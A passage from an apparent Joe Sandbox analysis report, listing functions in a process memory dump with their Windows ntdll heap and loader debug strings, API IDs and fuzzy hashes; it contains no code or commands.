                                                                                                                                                                                    • Opcode Fuzzy Hash: a9a25c7982c7f677d095af0e740fde0e728a12566e7dc147738a1e36af69007d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 09E105796053418FE706CF24C890B5ABBE1BF85368F501A2DFE65CB290DB71DA45CB82
                                                                                                                                                                                    Function 3253D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Actx , xrefs: 32589315
                                                                                                                                                                                    • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32589153
                                                                                                                                                                                    • GsHd, xrefs: 3253D794
                                                                                                                                                                                    • RtlpFindActivationContextSection_CheckParameters, xrefs: 3258914E, 32589173
                                                                                                                                                                                    • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32589372
                                                                                                                                                                                    • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32589178
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                                    • API String ID: 3446177414-2196497285
                                                                                                                                                                                    • Opcode ID: 4dd926d00e06487a5fa7f20303e3aaece6e1965e195a645cdd862779120fab46
                                                                                                                                                                                    • Instruction ID: 913f2448de4553dedaf21a5d285fd805a4f52eab1d37139ee0ee98e90e6bc15f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4dd926d00e06487a5fa7f20303e3aaece6e1965e195a645cdd862779120fab46
                                                                                                                                                                                    • Instruction Fuzzy Hash: A3E1B27560A3419FE705CF14C880B5AFBF4BF88758F405A2DEA958B381DB71EA44CB92
                                                                                                                                                                                    Function 3259FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                                    • API String ID: 3446177414-4227709934
                                                                                                                                                                                    • Opcode ID: a22cf8049b7b27778ca2d71a4aeeb1a8892c2bd80ba6dca6391a686c47a15b35
                                                                                                                                                                                    • Instruction ID: 91525fb2bfa743c3e2981dd4ae2d1f6d1f6488c88e217824ae5cac13053ac1e2
                                                                                                                                                                                    • Opcode Fuzzy Hash: a22cf8049b7b27778ca2d71a4aeeb1a8892c2bd80ba6dca6391a686c47a15b35
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E416DB9A01209ABDB01CF95C980ADEBFB5FF88754F144429ED05A7350DB71AF81CB90
                                                                                                                                                                                    Function 325CF8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                                                    • API String ID: 3446177414-3492000579
                                                                                                                                                                                    • Opcode ID: 61a3906da297f0eae95ecb51a74aa9f311eb3e668c0171ce0ecf3eea0a51cb3b
                                                                                                                                                                                    • Instruction ID: 03c9201c09a02bbd60be05b25f26e2a4c40a5b1313675c432a076e3881023bb0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 61a3906da297f0eae95ecb51a74aa9f311eb3e668c0171ce0ecf3eea0a51cb3b
                                                                                                                                                                                    • Instruction Fuzzy Hash: EF712F75A01694EFDB05CFA8D490AADFBF2FF88318F44845AE445EB251DB71AB81CB40
                                                                                                                                                                                    Function 32516565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32579843
                                                                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 32579854, 32579895
                                                                                                                                                                                    • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32579885
                                                                                                                                                                                    • LdrpLoadShimEngine, xrefs: 3257984A, 3257988B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                    • API String ID: 3446177414-3589223738
                                                                                                                                                                                    • Opcode ID: 93e778a42a6b3a5fc05e0a36091f9f222bc5ae3c437a281dc6f8dc4c56b163fc
                                                                                                                                                                                    • Instruction ID: d435eedff302414f95d58d84c941711798b73c97fffd4ede793ace804fed6c94
                                                                                                                                                                                    • Opcode Fuzzy Hash: 93e778a42a6b3a5fc05e0a36091f9f222bc5ae3c437a281dc6f8dc4c56b163fc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7851F575A42354AFEB04DBA8CC54F9D7BB6AF88314F440566E501FB295CBB0BE81C790
                                                                                                                                                                                    Function 3254DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                    • API String ID: 3446177414-3224558752
                                                                                                                                                                                    • Opcode ID: aeacbb5f1e3e4578e8e9450a5e7a3b4ee2dbe86d442fee2221c60190313a03ac
                                                                                                                                                                                    • Instruction ID: 9f3060174695caf763029e20feb32902f8df6637b50a33b2d3babbd657fd4b96
                                                                                                                                                                                    • Opcode Fuzzy Hash: aeacbb5f1e3e4578e8e9450a5e7a3b4ee2dbe86d442fee2221c60190313a03ac
                                                                                                                                                                                    • Instruction Fuzzy Hash: 00413535701740EFE711CF29C444B5ABBA4FF88364F5489AAE80597691CFB8AB81CB91
                                                                                                                                                                                    Function 325CECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Entry Heap Size , xrefs: 325CEDED
                                                                                                                                                                                    • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 325CEDE3
                                                                                                                                                                                    • HEAP: , xrefs: 325CECDD
                                                                                                                                                                                    • ---------------------------------------, xrefs: 325CEDF9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                                                    • API String ID: 3446177414-1102453626
                                                                                                                                                                                    • Opcode ID: dffaf34347e3f9852ec9e04b82001a09762ad81ee0ec5f38bb879063836f34b4
                                                                                                                                                                                    • Instruction ID: 90d02df8b6638f86dfc8526184835f0570020a90cb262fa26a78f3789f1e6a80
                                                                                                                                                                                    • Opcode Fuzzy Hash: dffaf34347e3f9852ec9e04b82001a09762ad81ee0ec5f38bb879063836f34b4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 40418F79A41225EFD705CF55C580959BBF5EF8935471588BED404AB210EB31FE82CBD0
                                                                                                                                                                                    Function 3254DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                    • API String ID: 3446177414-1222099010
                                                                                                                                                                                    • Opcode ID: 245bc78671ce4998bdd7d9133eb9b12baaf7820f422ecb647832be0165fd65e4
                                                                                                                                                                                    • Instruction ID: 330f568de95a24f218afa03d092b4db173b94ad2f3281c0482be1380300ce62f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 245bc78671ce4998bdd7d9133eb9b12baaf7820f422ecb647832be0165fd65e4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 38310375202784AFF726CB28C408B49BBE4EF49764F454885E84197A91CFB9AB81CE51
                                                                                                                                                                                    Function 32529046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: $$@
                                                                                                                                                                                    • API String ID: 3446177414-1194432280
                                                                                                                                                                                    • Opcode ID: bcb2505a23d24d377787b84e4ffabfc6118a03b6cebc72265abb53a181cbed69
                                                                                                                                                                                    • Instruction ID: 15f6120e82ab570a19a830750e154fff1ce440cd2ebaef6e3741340bc2800bfc
                                                                                                                                                                                    • Opcode Fuzzy Hash: bcb2505a23d24d377787b84e4ffabfc6118a03b6cebc72265abb53a181cbed69
                                                                                                                                                                                    • Instruction Fuzzy Hash: ED814D75D012699BDB25CF54CC40BEEBBB8AF48714F1045DAAA09B7290EB709F85CF60
                                                                                                                                                                                    Function 32554C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • LdrpFindDllActivationContext, xrefs: 32593440, 3259346C
                                                                                                                                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 32593439
                                                                                                                                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 32593466
                                                                                                                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 3259344A, 32593476
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                    • API String ID: 3446177414-3779518884
                                                                                                                                                                                    • Opcode ID: f6503ff16543f0e9996595320bc7a9e8ffb8562178145fbbe78ae1ec55e7ceea
                                                                                                                                                                                    • Instruction ID: 9f6ba5815af90faf12049b3558ca0232e6a616e823f2d0405b9ba8ba0540cd68
                                                                                                                                                                                    • Opcode Fuzzy Hash: f6503ff16543f0e9996595320bc7a9e8ffb8562178145fbbe78ae1ec55e7ceea
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D312AB6940351FFF7119F06C844B5ABBA4FBC539AFA2816BD80267140DB60AFC0C6B1
                                                                                                                                                                                    Function 3251F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                    • API String ID: 3446177414-3610490719
                                                                                                                                                                                    • Opcode ID: bb020546c48e0cc51b3095d7503fbcc2fb9e087d3025fe1aba510ca9271baa72
                                                                                                                                                                                    • Instruction ID: b82f7e0b09eead4b7b63942f6d4a9c03db21aaf74b6b52aec8f39603ce378954
                                                                                                                                                                                    • Opcode Fuzzy Hash: bb020546c48e0cc51b3095d7503fbcc2fb9e087d3025fe1aba510ca9271baa72
                                                                                                                                                                                    • Instruction Fuzzy Hash: D9910675284750AFFB16DB28C880B2EBBA5BF84744F440859E940DB286DB78FB41CBD1
                                                                                                                                                                                    Function 32540AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 32589F2E
                                                                                                                                                                                    • LdrpCheckModule, xrefs: 32589F24
                                                                                                                                                                                    • Failed to allocated memory for shimmed module list, xrefs: 32589F1C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                    • API String ID: 3446177414-161242083
                                                                                                                                                                                    • Opcode ID: dec029f60b4e3bd7013054b2003654c8836e77af6e67ebbfcbce36d8c2b83b9e
                                                                                                                                                                                    • Instruction ID: d13c8db52325562036045fa35db2fd649c5e12dcf580421ade235e272214f16b
                                                                                                                                                                                    • Opcode Fuzzy Hash: dec029f60b4e3bd7013054b2003654c8836e77af6e67ebbfcbce36d8c2b83b9e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3571A775A002059FEB09DF64C990BAEBBF4EF88308F54446AD905E7750EB74AB82CB54
                                                                                                                                                                                    Function 3254EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 60b0e436e9f10fe8ec9ee4e67edc0ceeebf5f9f18e9e911f841b694dca5663e0
                                                                                                                                                                                    • Instruction ID: a2102d1132ce1c71ce4da43aaba85fdc6f4002585f7f6a218ec0828afbdf9455
                                                                                                                                                                                    • Opcode Fuzzy Hash: 60b0e436e9f10fe8ec9ee4e67edc0ceeebf5f9f18e9e911f841b694dca5663e0
                                                                                                                                                                                    • Instruction Fuzzy Hash: E8E1D075901708DFDB25CFA9C980A9DFBF1BF88304F10492AE946E7660DB70AA41CF50
                                                                                                                                                                                    Function 325FA04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3446177414-0
                                                                                                                                                                                    • Opcode ID: 8cd30f7f3a299fb4a5976e7265c32cc84aea5cf93185cd62690ec0e2eb8ec494
                                                                                                                                                                                    • Instruction ID: cd90f2291adbfab8383786bb0a677568c4b80ba58270f2f6321c26ddea4ec725
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cd30f7f3a299fb4a5976e7265c32cc84aea5cf93185cd62690ec0e2eb8ec494
                                                                                                                                                                                    • Instruction Fuzzy Hash: B2517C78701612EFEB08CE18C890A29BBE5BF8DB54B11456DD906D7B10DB72AE41CB82
                                                                                                                                                                                    Function 32557A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4281723722-0
                                                                                                                                                                                    • Opcode ID: e279e610dab6a391dee987bce94e978125796d8f07ec3827be8709a6652c23bf
                                                                                                                                                                                    • Instruction ID: 5aa410c038192a07bc07a9f1705a53d90a18903a1b815743a7488f5b957078d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: e279e610dab6a391dee987bce94e978125796d8f07ec3827be8709a6652c23bf
                                                                                                                                                                                    • Instruction Fuzzy Hash: E7312475E42258EFCB05DFA8D845A9DBBF0AF88321F10456AE511B7390DB356A81CF50
                                                                                                                                                                                    Function 325258E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 0-2766056989
                                                                                                                                                                                    • Opcode ID: f721704d30f7301827fe544fe5aae07b1189f0e86d52c37dec54756cdceace1a
                                                                                                                                                                                    • Instruction ID: fe8a1d87516de07768287145cab55e5baca36befd6fcfaa90290be3e5e984a6a
                                                                                                                                                                                    • Opcode Fuzzy Hash: f721704d30f7301827fe544fe5aae07b1189f0e86d52c37dec54756cdceace1a
                                                                                                                                                                                    • Instruction Fuzzy Hash: EA323674901369DFEB29CF64C984BE9BBB0BB48304F4045E9D949A72C1DBB49B84CF91
                                                                                                                                                                                    Function 325C8B90 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 298COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: HEAP: ${\2
                                                                                                                                                                                    • API String ID: 0-2341721578
                                                                                                                                                                                    • Opcode ID: 9e9cf89f5b122b33af52089f30f88e01a5a28d3b10c5460172859e5104ccd087
                                                                                                                                                                                    • Instruction ID: 6b410620da7b807f965981ba90c2dcf87b8a2d05a26c6e87f0ec5ecae48e8e76
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e9cf89f5b122b33af52089f30f88e01a5a28d3b10c5460172859e5104ccd087
                                                                                                                                                                                    • Instruction Fuzzy Hash: 74B1BE716093619FD711CF64D884A5BBBE5EFC4758F404A6EF994CB290EB30DA04CB92
                                                                                                                                                                                    Function 32554B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0$Flst
                                                                                                                                                                                    • API String ID: 0-758220159
                                                                                                                                                                                    • Opcode ID: 94efdefd1b79b22cc61999e5d3e533cb1b091455c66db56ea721793ec9df2236
                                                                                                                                                                                    • Instruction ID: 8a11fae98c211b7679d68277ab3a284ba7d8ed05e211355ce54645009ff54c89
                                                                                                                                                                                    • Opcode Fuzzy Hash: 94efdefd1b79b22cc61999e5d3e533cb1b091455c66db56ea721793ec9df2236
                                                                                                                                                                                    • Instruction Fuzzy Hash: E951CFB5E01248DFEB15CF96C48479DFBF4EF84756F24842ED4469B240EBB09A81CB90
                                                                                                                                                                                    Function 3251E67A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
